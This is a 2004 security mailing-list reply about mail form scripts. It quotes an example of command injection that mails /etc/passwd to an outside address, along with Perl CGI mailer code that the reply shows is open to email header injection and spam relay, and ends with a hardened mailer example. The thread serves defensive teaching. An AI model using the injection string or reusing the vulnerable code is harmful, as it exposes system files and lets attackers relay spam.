RE: Secure Form Script?
From: Tim Greer (chatmaster_at_charter.net)
Date: 05/16/04
- Previous message: Stephen Samuel: "Re: Secure Form Script?"
- In reply to: Runion Mark A FGA DOIM WEBMASTER(ctr): "RE: Secure Form Script?"
- Next in thread: Beth Skwarecki: "RE: Secure Form Script?"
To: Runion Mark A "FGA DOIM WEBMASTER(ctr)" <mark.runion@us.army.mil>
Date: 15 May 2004 23:53:13 -0700
On Fri, 2004-05-14 at 11:58, Runion Mark A FGA DOIM WEBMASTER(ctr) wrote:
> Because when they hijack the input to a sendmail command you generally see
> something like this:
> exec '$ sendmail $string';
> And when the actual string looks something like:
> exec '$ sendmail | sendmail -f /etc/passwd to@me.com';
>
> If you setup a program to vet the input or use a secured shell to operate
> your mail program this can be ignored. Meaning compile your own without the
> snazzy pipes, stops, or other functions one typically finds in all the
> shells. For example instead of using direct executes, just send the email.
> Try something like this instead:
>
> sub sendmail {
> local $mailto = shift @_;
> local $mailprog = "/usr/bin/mailx";
> local $mailfrom = "Your program";
>
> # Open The Mail Program
> open(MAIL,"|$mailprog -t") || die "Content-type: text/html\n\nSENDMAIL ERROR: Please contact the <a href=\"mailto:$webmaster\">You</a>.";
>
> print MAIL "From: Your site\n";
> print MAIL "To: $mailto\n";
> print MAIL "Subject: Your subject $Form{subject},";
> print MAIL " $Form{first_name}\n\n";
> print MAIL "---------------------------------------------------------------------\n";
> print MAIL "FIRSTN: $Form{first_name}\n";
> print MAIL "Systems List: $Form{system_list}\n\n";
>
> close MAIL;
> return 0;
> }
>
>
> If the incoming data is highly suspicious try something like:
> $Form{$value} =~ s/\|//g;
>
> So in a parsing function you might do this:
> sub parse_form {
> # Hash form of data is good
> local $buffer = "";
>
> # Get the input
> read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
>
> # Split the name-value pairs
> @pairs = split(/&/, $buffer);
>
> foreach $pair (@pairs) {
> local($name, $value) = split(/=/, $pair);
> # Gets rid of any "junk"
> $name =~ tr/+/ /;
> $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> $value =~ tr/+/ /;
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> $value =~ s/<!--(.|\n)*-->//g; # Clean it up... This is the same
>
> # Associates a name with a value
> if ($value ne '') {
> $Form{$name} = $value;
> }
> }
> }
> -
> Mark Runion
>
> /*
> "So far beyond cutting edge the blade is null event horizon."
> */
The script example above would allow a spammer to pass in their
own "subject" argument and effectively CC: and BCC: to other
addresses, as well as terminate the email early with a .dot+new line
to override your script's settings. Thus, it could be easily hijacked
to relay spam through the script. Just removing pipes isn't enough.
Further, I'm not sure the purpose of your email script "cleaning up"
HTML comment tags--unless you are going to view the email text on
a page that will somehow execute SSI tags!?? I don't mean to knock
your post, but just letting you know that you've explicitly allowed
spammers the ability to relay through the script you exampled.
--
Regards,
Tim Greer
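A hardened form of the mailer that addresses the header-injection problem described above. This is an added example, not code from either poster; the mailer path /usr/sbin/sendmail, the recipient allow-list and the helper names are assumptions.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed mailer path and a constructed server-side allow-list of recipients,
# so the form can never choose where the message goes.
my $MAILPROG   = '/usr/sbin/sendmail';
my %ALLOWED_TO = ('webmaster@example.org' => 1);

# A CR, LF or NUL in a header field is what lets a submitter append
# "Cc:"/"Bcc:" lines or end the message early, so the field is rejected
# outright rather than silently "cleaned".
sub header_value_ok {
    my ($value) = @_;
    return 0 unless defined $value;
    return 0 if $value =~ /[\r\n\0]/;
    return 0 if length($value) > 200;
    return 1;
}

sub recipient_ok {
    my ($addr) = @_;
    return defined $addr && exists $ALLOWED_TO{$addr} ? 1 : 0;
}

# Returns the full message text, or undef if any field fails its check.
sub build_message {
    my (%form) = @_;
    return undef unless recipient_ok($form{to});
    return undef unless header_value_ok($form{subject});
    return undef unless header_value_ok($form{first_name});
    my $body = "FIRSTN: $form{first_name}\n";
    $body =~ s/^\./../mg;    # a lone "." line must not terminate the message
    return "To: $form{to}\nSubject: $form{subject}\n\n$body";
}

sub send_message {
    my ($msg) = @_;
    # List-form open runs the mailer directly, with no shell to interpret '|'.
    open(my $mh, '|-', $MAILPROG, '-t', '-i') or die "cannot run $MAILPROG: $!";
    print {$mh} $msg;
    close($mh) or die "mailer failed: $?";
}

# Constructed inputs: a normal submission and one carrying an injected Bcc:.
my %good = (to => 'webmaster@example.org', subject => 'Hello', first_name => 'Ann');
my %bad  = (%good, subject => "Hello\nBcc: someone\@example.net");
print defined build_message(%good) ? "good: accepted\n" : "good: rejected\n";
print defined build_message(%bad)  ? "bad: accepted\n"  : "bad: rejected\n";
```

Only build_message is exercised here; send_message is left uncalled so the script can be run without a mailer present.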